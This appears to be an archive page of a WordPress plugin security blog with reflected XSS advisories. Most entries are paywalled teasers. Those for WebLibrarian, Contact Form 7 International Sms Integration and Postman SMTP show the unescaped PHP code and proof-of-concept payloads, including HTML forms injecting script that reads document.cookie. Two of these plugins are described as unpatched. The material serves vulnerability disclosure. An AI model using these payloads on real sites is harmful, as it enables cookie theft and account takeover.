26 Jul

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Simple Custom CSS and JS

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

An advisory released by the JPCERT/CC and IPA states that a reflected cross-site scripting (XSS) vulnerability had been fixed in version ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

26 Jul

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Popup Maker

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

An advisory released by the JPCERT/CC and IPA states that a cross-site scripting (XSS) vulnerability had been fixed in version 1.6.5 ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

25 Jul

Reflected Cross-Site Scripting (XSS) Vulnerability in WebLibrarian

Recently a change was made to plugin WebLibrarian that was supposed to “Fix XSS problem in front end short codes.”. After not finding any report had been put out on this issue we started looking over things to see if there was in fact a vulnerability and then prepare a post on it for our customer.

Before we were able to figure out how the issue could be exploited we found that a related vulnerability existed as of the new version.

When a page or post with the shortcode “weblib_itemlist” is visited the function item_list() is run, which is located /includes/short_codes.php.  Several lines in, the following code ran:

$result = "\n<!-- barcodetable: _REQUEST is ".print_r($_REQUEST,true)." -->\n";

That code will output and GET or POST inputs without them being escaped, which could be exploited for reflected cross-site scripting (XSS).

After notifying the developer of the issue, they resolved it the next day by commenting out the line (it was debug code).

Proof of Concept

The following proof of concept will cause any available cookies to be shown in alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Visit a post or page that has the “weblib_itemlist” shortcode and add the following URL parameter to the URL and then visiting the resulting URL (add a “?” before it if there are not already an URL parameters):

xss=--><script>alert(document.cookie);</script>

Timeline

  • July 24, 2017 – Developer notified.
  • July 25, 2017 – Version 3.4.8.7 released, which fixes vulnerability.
19 Jul

Reflected Cross-Site Scripting (XSS) Vulnerability in Contact Form 7 International Sms Integration

Last month we were trying to get an idea of how effective it would be to try to proactively catch some vulnerabilities when changes are made to WordPress plugins that include those vulnerabilities. In doing one of the preliminary checks we came across a reflected cross-site scripting (XSS) vulnerability that exists in the plugin Contact Form 7 International Sms Integration.

On line 366 of the file /includes/admin/class-sms-log-display.php the value of GET or POST input “page” is output without being escaped:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />

While the GET input “page” needs to be set to “cf7-international-sms-integration-settings” for that code to run, the POST input can be set to another value and depending on the configuration of PHP will be the one chosen to be output.

We notified the developer of the issue a month ago, they promptly responded that they would fix it “asap”, but so far the plugin has not been updated.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=cf7-international-sms-integration-settings&tab=smslogs" method="POST">
<input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • June 19, 2017 – Developer notified.
  • June 19, 2017 – Developer responded.
10 Jul

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in WP Live Chat Support

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

An advisory was released by the JPCERT/CC and IPA that a cross-site scripting (XSS) vulnerability had been fixed in ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

06 Jul

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Responsive Lightbox

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

An advisory was released by the JPCERT/CC and IPA that a cross-site scripting (XSS) vulnerability had been fixed in version 1.7.2 ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

30 Jun

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Event Calendar WD

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

An advisory was released by the JPCERT/CC and IPA that a cross-site scripting (XSS) vulnerability had been fixed in ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

29 Jun

Reflected Cross-Site Scripting (XSS) Vulnerability in Postman SMTP

We recently found the the plugin Postman SMTP contains a reflected cross-site scripting (XSS) vulnerability.

On line 346 of the file /Postman/Postman-Email-Log/PostmanEmailLogController.php the value of GET or POST input “page” is output without being escaped:

value="<?php echo $_REQUEST['page'] ?>" />

While the GET input “page” needs to be set to “postman_email_log” for that code to run, the POST input can be set to another value and depending on the configuration of PHP will be the one chosen to be output.

The website of the developer is down and we couldn’t find any other method to contact them directly. The plugin was last updated 16 months ago and is only listed as being compatible up to WordPress 4.4, so it doesn’t look like it is being maintained at this time.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=postman_email_log" method="POST">
<input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>
23 Jun

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Analytics Tracker

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

The changelog entry for version 1.1.1 of the plugin Analytics Tracker is “Fixed XSS vulnerability on search event, thanks to Arjan ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.